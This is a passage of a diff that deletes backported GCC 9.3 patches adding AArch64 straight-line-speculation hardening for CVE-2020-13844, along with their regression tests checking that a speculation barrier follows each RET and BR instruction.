-+@item blr
-+@end table
-+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
-+@samp{-mharden-sls=none} disables all SLS hardening.
-+
- @item -msve-vector-bits=@var{bits}
- @opindex msve-vector-bits
- Specify the number of bits in an SVE vector register.  This option only has
--- 
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
- instructions
-
-Instructions following RET or BR are not necessarily executed.  In order
-to avoid speculation past RET and BR we can simply append a speculation
-barrier.
-
-Since these speculation barriers will not be architecturally executed,
-they are not expected to add a high performance penalty.
-
-The speculation barrier is to be SB when targeting architectures which
-have this enabled, and DSB SY + ISB otherwise.
-
-We add tests for each of the cases where such an instruction was seen.
-
-This is implemented by modifying each machine description pattern that
-emits either a RET or a BR instruction.  We choose not to use something
-like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
-`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
-patterns and we find it preferable to implement the functionality in the
-same way for every pattern.
-
-There is one particular case which is slightly tricky.  The
-implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
-to be mitigated against.  The trampoline template is used *once* per
-compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
-builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
-In the future we may implement function specific attributes to turn on
-and off hardening on a per-function basis.
-The fixed nature of the trampoline described above implies it will be
-safer to ensure this speculation barrier is always used.
-
-Testing:
-  Bootstrap and regtest done on aarch64-none-linux
-  Used a temporary hack(1) to use these options on every test in the
-  testsuite and a script to check that the output never emitted an
-  unmitigated RET or BR.
-
-1) Temporary hack was a change to the testsuite to always use
-`-save-temps` and run a script on the assembly output of those
-compilations which produced one to ensure every RET or BR is immediately
-followed by a speculation barrier.
-
-(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
-
-gcc/ChangeLog:
-
-	* config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
-	* config/aarch64/aarch64.c (aarch64_output_casesi): Emit
-	speculation barrier after BR instruction if needs be.
-	(aarch64_trampoline_init): Handle ptr_mode value & adjust size
-	of code copied.
-	(aarch64_sls_barrier): New.
-	(aarch64_asm_trampoline_template): Add needed barriers.
-	* config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
-	(TARGET_SB): New.
-	(TRAMPOLINE_SIZE): Account for barrier.
-	* config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
-	simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
-	Emit barrier if needs be, also account for possible barrier using
-	"sls_length" attribute.
-	(sls_length): New attribute.
-	(length): Determine default using any non-default sls_length
-	value.
-
-gcc/testsuite/ChangeLog:
-
-	* gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
-	* gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
-	New test.
-	* gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
-	* lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
-	New proc.
----
- gcc/config/aarch64/aarch64-protos.h           |   1 +
- gcc/config/aarch64/aarch64.c                  |  41 +++++-
- gcc/config/aarch64/aarch64.h                  |  10 +-
- gcc/config/aarch64/aarch64.md                 |  75 ++++++++---
- .../sls-mitigation/sls-miti-retbr-pacret.c    |  15 +++
- .../aarch64/sls-mitigation/sls-miti-retbr.c   | 119 ++++++++++++++++++
- .../aarch64/sls-mitigation/sls-mitigation.exp |  73 +++++++++++
- gcc/testsuite/lib/target-supports.exp         |   3 +-
- 8 files changed, 312 insertions(+), 25 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 31493f412..885eae893 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- 
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
- 
-+const char *aarch64_sls_barrier (int);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
- 
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index 269ff6c92..dff61105c 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
- static void
- aarch64_asm_trampoline_template (FILE *f)
- {
--  int offset1 = 16;
--  int offset2 = 20;
-+  int offset1 = 24;
-+  int offset2 = 28;
- 
-   if (aarch64_bti_enabled ())
-     {
-@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
-     }
-   asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
- 
-+  /* We always emit a speculation barrier.
-+     This is because the same trampoline template is used for every nested
-+     function.  Since nested functions are not particularly common or
-+     performant we don't worry too much about the extra instructions to copy
-+     around.
-+     This is not yet a problem, since we have not yet implemented function
-+     specific attributes to choose between hardening against straight line
-+     speculation or not, but such function specific attributes are likely to
-+     happen in the future.  */
-+  asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
-+
-   /* The trampoline needs an extra padding instruction.  In case if BTI is
-      enabled the padding instruction is replaced by the BTI instruction at
-      the beginning.  */
-@@ -8450,10 +8461,14 @@ static void
- aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
- {
-   rtx fnaddr, mem, a_tramp;
--  const int tramp_code_sz = 16;
-+  const int tramp_code_sz = 24;
- 
-   /* Don't need to copy the trailing D-words, we fill those in below.  */
--  emit_block_move (m_tramp, assemble_trampoline_template (),
-+  /* We create our own memory address in Pmode so that `emit_block_move` can
-+     use parts of the backend which expect Pmode addresses.  */
-+  rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
-+  emit_block_move (gen_rtx_MEM (BLKmode, temp),
-+		   assemble_trampoline_template (),
- 		   GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
-   mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
-   fnaddr = XEXP (DECL_RTL (fndecl), 0);
-@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
-   output_asm_insn (buf, operands);
-   output_asm_insn (patterns[index][1], operands);
-   output_asm_insn ("br\t%3", operands);
-+  output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
-+		   operands);
-   assemble_label (asm_out_file, label);
-   return "";
- }
-@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
- 
-+/* Helper function for straight line speculation.
-+   Return what barrier should be emitted for straight line speculation
-+   mitigation.
-+   When not mitigating against straight line speculation this function returns
-+   an empty string.
-+   When mitigating against straight line speculation, use:
-+   * SB when the v8.5-A SB extension is enabled.
-+   * DSB+ISB otherwise.  */
-+const char *
-+aarch64_sls_barrier (int mitigation_required)
-+{
-+  return mitigation_required
-+    ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
-+    : "";
-+}
-+
- /* Target-specific selftests.  */
- 
- #if CHECKING_P
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 772a97296..72ddc6fd9 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
- #define AARCH64_ISA_F16FML	   (aarch64_isa_flags & AARCH64_FL_F16FML)
- #define AARCH64_ISA_RCPC8_4	   (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
- #define AARCH64_ISA_V8_5	   (aarch64_isa_flags & AARCH64_FL_V8_5)
-+#define AARCH64_ISA_SB		   (aarch64_isa_flags & AARCH64_FL_SB)
- 
- /* Crypto is an optional extension to AdvSIMD.  */
- #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
-@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
- #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
- #endif
- 
-+/* SB instruction is enabled through +sb.  */
-+#define TARGET_SB (AARCH64_ISA_SB)
-+
- /* Apply the workaround for Cortex-A53 erratum 835769.  */
- #define TARGET_FIX_ERR_A53_835769	\
-   ((aarch64_fix_a53_err835769 == 2)	\
-@@ -931,8 +935,10 @@ typedef struct
- 
- #define RETURN_ADDR_RTX aarch64_return_addr
- 
--/* BTI c + 3 insns + 2 pointer-sized entries.  */
--#define TRAMPOLINE_SIZE	(TARGET_ILP32 ? 24 : 32)
-+/* BTI c + 3 insns
-+   + sls barrier of DSB + ISB.
-+   + 2 pointer-sized entries.  */
-+#define TRAMPOLINE_SIZE	(24 + (TARGET_ILP32 ? 8 : 16))
- 
- /* Trampolines contain dwords, so must be dword aligned.  */
- #define TRAMPOLINE_ALIGNMENT 64
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index cc5a887d4..494aee964 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -331,10 +331,25 @@
- ;; Attribute that specifies whether the alternative uses MOVPRFX.
- (define_attr "movprfx" "no,yes" (const_string "no"))
- 
-+;; Attribute to specify that an alternative has the length of a single
-+;; instruction plus a speculation barrier.
-+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
-+
- (define_attr "length" ""
-   (cond [(eq_attr "movprfx" "yes")
-            (const_int 8)
--        ] (const_int 4)))
-+
-+	 (eq_attr "sls_length" "retbr")
-+	   (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
-+		  (match_test "TARGET_SB") (const_int 8)]
-+		 (const_int 12))
-+
-+	 (eq_attr "sls_length" "casesi")
-+	   (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
-+		  (match_test "TARGET_SB") (const_int 20)]
-+		 (const_int 24))
-+	]
-+	  (const_int 4)))
- 
- ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
- ;; no predicated insns.
-@@ -370,8 +385,12 @@
- (define_insn "indirect_jump"
-   [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
-   ""
--  "br\\t%0"
--  [(set_attr "type" "branch")]
-+  {
-+    output_asm_insn ("br\\t%0", operands);
-+    return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+  }
-+  [(set_attr "type" "branch")
-+   (set_attr "sls_length" "retbr")]
- )
- 
- (define_insn "jump"
-@@ -657,7 +676,7 @@
-   "*
-   return aarch64_output_casesi (operands);
-   "
--  [(set_attr "length" "16")
-+  [(set_attr "sls_length" "casesi")
-    (set_attr "type" "branch")]
- )
- 
-@@ -736,14 +755,18 @@
-   [(return)]
-   ""
-   {
-+    const char *ret = NULL;
-     if (aarch64_return_address_signing_enabled ()
- 	&& TARGET_ARMV8_3
- 	&& !crtl->calls_eh_return)
--      return "retaa";
--
--    return "ret";
-+      ret = "retaa";
-+    else
-+      ret = "ret";
-+    output_asm_insn (ret, operands);
-+    return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-   }
--  [(set_attr "type" "branch")]
-+  [(set_attr "type" "branch")
-+   (set_attr "sls_length" "retbr")]
- )
- 
- (define_expand "return"
-@@ -755,8 +778,12 @@
- (define_insn "simple_return"
-   [(simple_return)]
-   "aarch64_use_simple_return_insn_p ()"
--  "ret"
--  [(set_attr "type" "branch")]
-+  {
-+    output_asm_insn ("ret", operands);
-+    return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+  }
-+  [(set_attr "type" "branch")
-+   (set_attr "sls_length" "retbr")]
- )
- 
- (define_insn "*cb<optab><mode>1"
-@@ -947,10 +974,16 @@
- 	 (match_operand 1 "" ""))
-    (return)]
-   "SIBLING_CALL_P (insn)"
--  "@
--   br\\t%0
--   b\\t%c0"
--  [(set_attr "type" "branch, branch")]
-+  {
-+    if (which_alternative == 0)
-+      {
-+	output_asm_insn ("br\\t%0", operands);
-+	return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+      }
-+    return "b\\t%c0";
-+  }
-+  [(set_attr "type" "branch, branch")
-+   (set_attr "sls_length" "retbr,none")]
- )
- 
- (define_insn "*sibcall_value_insn"
-@@ -960,10 +993,16 @@
- 	      (match_operand 2 "" "")))
-    (return)]
-   "SIBLING_CALL_P (insn)"
--  "@
--   br\\t%1
--   b\\t%c1"
--  [(set_attr "type" "branch, branch")]
-+  {
-+    if (which_alternative == 0)
-+      {
-+	output_asm_insn ("br\\t%1", operands);
-+	return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+      }
-+    return "b\\t%c1";
-+  }
-+  [(set_attr "type" "branch, branch")
-+   (set_attr "sls_length" "retbr,none")]
- )
- 
- ;; Call subroutine returning any type.
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-new file mode 100644
-index 000000000..7656123ee
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-@@ -0,0 +1,15 @@
-+/* Avoid ILP32 since pacret is only available for LP64 */
-+/* { dg-do compile { target { ! ilp32 } } } */
-+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
-+
-+/* Testing the do_return pattern for retaa.  */
-+long retbr_subcall(void);
-+long retbr_do_return_retaa(void)
-+{
-+    return retbr_subcall()+1;
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+   by a speculation barrier.  */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
-+/* { dg-final { scan-assembler-not {ret\t} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-new file mode 100644
-index 000000000..573b30cdc
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-@@ -0,0 +1,119 @@
-+/* We ensure that -Wpedantic is off since it complains about the trampolines
-+   we explicitly want to test.  */
-+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
-+/*
-+   Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
-+   instructions.
-+  */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+    foo *x;
-+    bar *y;
-+    int left;
-+    int right;
-+};
-+
-+int
-+retbr_sibcall_value_insn (struct sls_testclass x)
-+{
-+  return x.x(x.left, x.right);
-+}
-+
-+void
-+retbr_sibcall_insn (struct sls_testclass x)
-+{
-+  x.y(x.left, x.right);
-+}
-+
-+/* Aim to test two different returns.
-+   One that introduces a tail call in the middle of the function, and one that
-+   has a normal return.  */
-+int
-+retbr_multiple_returns (struct sls_testclass x)
-+{
-+  int temp;
-+  if (x.left % 10)
-+    return x.x(x.left, 100);
-+  else if (x.right % 20)
-+    {
-+      return x.x(x.left * x.right, 100);
-+    }
-+  temp = x.left % x.right;
-+  temp *= 100;
-+  temp /= 2;
-+  return temp % 3;
-+}
-+
-+void
-+retbr_multiple_returns_void (struct sls_testclass x)
-+{
-+  if (x.left % 10)
-+    {
-+      x.y(x.left, 100);
-+    }
-+  else if (x.right % 20)
-+    {
-+      x.y(x.left * x.right, 100);
-+    }
-+  return;
-+}
-+
-+/* Testing the casesi jump via register.  */
-+__attribute__ ((optimize ("Os")))
-+int
-+retbr_casesi_dispatch (struct sls_testclass x)
-+{
-+  switch (x.left)
-+    {
-+    case -5:
-+      return -2;
-+    case -3:
-+      return -1;
-+    case 0:
-+      return 0;
-+    case 3:
-+      return 1;
-+    case 5:
-+      break;
-+    default:
-+      __builtin_unreachable ();
-+    }
-+  return x.right;
-+}
-+
-+/* Testing the BR in trampolines is mitigated against.  */
-+void f1 (void *);
-+void f3 (void *, void (*)(void *));
-+void f2 (void *);
-+
-+int
-+retbr_trampolines (void *a, int b)
-+{
-+  if (!b)
-+    {
-+      f1 (a);
-+      return 1;
-+    }
-+  if (b)
-+    {
-+      void retbr_tramp_internal (void *c)
-+      {
-+	if (c == a)
-+	  f2 (c);
-+      }
-+      f3 (a, retbr_tramp_internal);
-+    }
-+  return 0;
-+}
-+
-+/* Testing the indirect_jump pattern.  */
-+void
-+retbr_indirect_jump (int *buf)
-+{
-+  __builtin_longjmp(buf, 1);
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+   by a speculation barrier.  */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-new file mode 100644
-index 000000000..812250379
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-@@ -0,0 +1,73 @@
-+#  Regression driver for SLS mitigation on AArch64.
-+#  Copyright (C) 2020 Free Software Foundation, Inc.
-+#  Contributed by ARM Ltd.
-+#
-+#  This file is part of GCC.
-+#
-+#  GCC is free software; you can redistribute it and/or modify it
-+#  under the terms of the GNU General Public License as published by
-+#  the Free Software Foundation; either version 3, or (at your option)
-+#  any later version.
-+#
-+#  GCC is distributed in the hope that it will be useful, but
-+#  WITHOUT ANY WARRANTY; without even the implied warranty of
-+#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+#  General Public License for more details.
-+#
-+#  You should have received a copy of the GNU General Public License
-+#  along with GCC; see the file COPYING3.  If not see
-+#  <http://www.gnu.org/licenses/>.  */
-+
-+# Exit immediately if this isn't an AArch64 target.
-+if {![istarget aarch64*-*-*] } then {
-+  return
-+}
-+
-+# Load support procs.
-+load_lib gcc-dg.exp
-+load_lib torture-options.exp
-+
-+# If a testcase doesn't have special options, use these.
-+global DEFAULT_CFLAGS
-+if ![info exists DEFAULT_CFLAGS] then {
-+    set DEFAULT_CFLAGS " "
-+}
-+
-+# Initialize `dg'.
-+dg-init
-+torture-init
-+
-+# Use different architectures as well as the normal optimisation options.
-+# (i.e. use both SB and DSB+ISB barriers).
-+
-+set save-dg-do-what-default ${dg-do-what-default}
-+# Main loop.
-+# Run with torture tests (i.e. a bunch of different optimisation levels) just
-+# to increase test coverage.
-+set dg-do-what-default assemble
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+	"-save-temps" $DEFAULT_CFLAGS
-+
-+# Run the same tests but this time with SB extension.
-+# Since not all supported assemblers will support that extension we decide
-+# whether to assemble or just compile based on whether the extension is
-+# supported for the available assembler.
-+
-+set templist {}
-+foreach x $DG_TORTURE_OPTIONS {
-+  lappend templist "$x -march=armv8.3-a+sb "
-+  lappend templist "$x -march=armv8-a+sb "
-+}
-+set-torture-options $templist
-+if { [check_effective_target_aarch64_asm_sb_ok] } {
-+    set dg-do-what-default assemble
-+} else {
-+    set dg-do-what-default compile
-+}
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+	"-save-temps" $DEFAULT_CFLAGS
-+set dg-do-what-default ${save-dg-do-what-default}
-+
-+# All done.
-+torture-finish
-+dg-finish
-diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
-index ea9a50ccb..79482f9b6 100644
---- a/gcc/testsuite/lib/target-supports.exp
-+++ b/gcc/testsuite/lib/target-supports.exp
-@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
- # Create functions to check that the AArch64 assembler supports the
- # various architecture extensions via the .arch_extension pseudo-op.
- 
--foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
-+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
-+			  "sb"} {
-     eval [string map [list FUNC $aarch64_ext] {
- 	proc check_effective_target_aarch64_asm_FUNC_ok { } {
- 	  if { [istarget aarch64*-*-*] } {
--- 
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch b/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
deleted file mode 100644
index 6dffef0a34..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
-
-This patch introduces the mitigation for Straight Line Speculation past
-the BLR instruction.
-
-This mitigation replaces BLR instructions with a BL to a stub which uses
-a BR to jump to the original value.  These function stubs are then
-appended with a speculation barrier to ensure no straight line
-speculation happens after these jumps.
-
-When optimising for speed we use a set of stubs for each function since
-this should help the branch predictor make more accurate predictions
-about where a stub should branch.
-
-When optimising for size we use one set of stubs for all functions.
-This set of stubs can have human readable names, and we are using
-`__call_indirect_x<N>` for register x<N>.
-
-When BTI branch protection is enabled the BLR instruction can jump to a
-`BTI c` instruction using any register, while the BR instruction can
-only jump to a `BTI c` instruction using the x16 or x17 registers.
-Hence, in order to ensure this transformation is safe we mov the value
-of the original register into x16 and use x16 for the BR.
-
-As an example when optimising for size:
-a
-    BLR x0
-instruction would get transformed to something like
-    BL __call_indirect_x0
-where __call_indirect_x0 labels a thunk that contains
-__call_indirect_x0:
-    MOV X16, X0
-    BR X16
-    <speculation barrier>
-
-The first version of this patch used local symbols specific to a
-compilation unit to try and avoid relocations.
-This was mistaken since functions coming from the same compilation unit
-can still be in different sections, and the assembler will insert
-relocations at jumps between sections.
-
-On any relocation the linker is permitted to emit a veneer to handle
-jumps between symbols that are very far apart.  The registers x16 and
-x17 may be clobbered by these veneers.
-Hence the function stubs cannot rely on the values of x16 and x17 being
-the same as just before the function stub is called.
-
-Similar can be said for the hot/cold partitioning of single functions,
-so function-local stubs have the same restriction.
-
-This updated version of the patch never emits function stubs for x16 and
-x17, and instead forces other registers to be used.
-
-Given the above, there is now no benefit to local symbols (since they
-are not enough to avoid dealing with linker intricacies).  This patch
-now uses global symbols with hidden visibility each stored in their own
-COMDAT section.  This means stubs can be shared between compilation
-units while still avoiding the PLT indirection.
-
-This patch also removes the `__call_indirect_x30` stub (and
-function-local equivalent) which would simply jump back to the original
-location.
-
-The function-local stubs are emitted to the assembly output file in one
-chunk, which means we need not add the speculation barrier directly
-after each one.
-This is because we know for certain that the instructions directly after
-the BR in all but the last function stub will be from another one of
-these stubs and hence will not contain a speculation gadget.
-Instead we add a speculation barrier at the end of the sequence of
-stubs.
-
-The global stubs are emitted in COMDAT/.linkonce sections by
-themselves so that the linker can remove duplicates from multiple object
-files.  This means they are not emitted in one chunk, and each one must
-include the speculation barrier.
-
-Another difference is that since the global stubs are shared across
-compilation units we do not know that all functions will be targeting an
-architecture supporting the SB instruction.
-Rather than provide multiple stubs for each architecture, we provide a
-stub that will work for all architectures -- using the DSB+ISB barrier.
-
-This mitigation does not apply for BLR instructions in the following
-places:
-- Some accesses to thread-local variables use a code sequence with a BLR
-  instruction.  This code sequence is part of the binary interface between
-  compiler and linker. If this BLR instruction needs to be mitigated, it'd
-  probably be best to do so in the linker. It seems that the code sequence
-  for thread-local variable access is unlikely to lead to a Spectre Revalation
-  Gadget.
-- PLT stubs are produced by the linker and each contain a BLR instruction.
-  It seems that at most only after the last PLT stub a Spectre Revalation
-  Gadget might appear.
-
-Testing:
-  Bootstrap and regtest on AArch64
-    (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
-  Used a temporary hack(1) in gcc-dg.exp to use these options on every
-  test in the testsuite, a slight modification to emit the speculation
-  barrier after every function stub, and a script to check that the
-  output never emitted a BLR, or unmitigated BR or RET instruction.
-  Similar on an aarch64-none-elf cross-compiler.
-
-1) Temporary hack emitted a speculation barrier at the end of every stub
-function, and used a script to ensure that:
-  a) Every RET or BR is immediately followed by a speculation barrier.
-  b) No BLR instruction is emitted by compiler.
-
-(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
-
-gcc/ChangeLog:
-
-	* config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
-	New declaration.
-	* config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
-	stub registers class.
-	(aarch64_class_max_nregs): Likewise.
-	(aarch64_register_move_cost): Likewise.
-	(aarch64_sls_shared_thunks): Global array to store stub labels.
-	(aarch64_sls_emit_function_stub): New.
-	(aarch64_create_blr_label): New.
-	(aarch64_sls_emit_blr_function_thunks): New.
-	(aarch64_sls_emit_shared_blr_thunks): New.
-	(aarch64_asm_file_end): New.
-	(aarch64_indirect_call_asm): New.
-	(TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
-	(TARGET_ASM_FUNCTION_EPILOGUE): Use
-	aarch64_sls_emit_blr_function_thunks.
-	* config/aarch64/aarch64.h (STB_REGNUM_P): New.
-	(enum reg_class): Add STUB_REGS class.
-	(machine_function): Introduce `call_via` array for
-	function-local stub labels.
-	* config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
-	aarch64_indirect_call_asm to emit code when hardening BLR
-	instructions.
-	* config/aarch64/constraints.md (Ucr): New constraint
-	representing registers for indirect calls.  Is GENERAL_REGS
-	usually, and STUB_REGS when hardening BLR instruction against
-	SLS.
-	* config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
-	is also a general register.
-
-gcc/testsuite/ChangeLog:
-
-	* gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
-	* gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
----
- gcc/config/aarch64/aarch64-protos.h           |   1 +
- gcc/config/aarch64/aarch64.c                  | 225 +++++++++++++++++-
- gcc/config/aarch64/aarch64.h                  |  15 ++
- gcc/config/aarch64/aarch64.md                 |  11 +-
- gcc/config/aarch64/constraints.md             |   9 +
- gcc/config/aarch64/predicates.md              |   3 +-
- .../aarch64/sls-mitigation/sls-miti-blr-bti.c |  40 ++++
- .../aarch64/sls-mitigation/sls-miti-blr.c     |  33 +++
- 8 files changed, 328 insertions(+), 9 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 885eae893..2676e43ae 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
- 
- const char *aarch64_sls_barrier (int);
-+const char *aarch64_indirect_call_asm (rtx);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
- 
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index dff61105c..bc6c02c3a 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
- enum reg_class
- aarch64_regno_regclass (unsigned regno)
- {
-+  if (STUB_REGNUM_P (regno))
-+    return STUB_REGS;
-+
-   if (GP_REGNUM_P (regno))
-     return GENERAL_REGS;
- 
-@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
-   unsigned int nregs;
-   switch (regclass)
-     {
-+    case STUB_REGS:
-     case TAILCALL_ADDR_REGS:
-     case POINTER_REGS:
-     case GENERAL_REGS:
-@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
-     = aarch64_tune_params.regmove_cost;
- 
-   /* Caller save and pointer regs are equivalent to GENERAL_REGS.  */
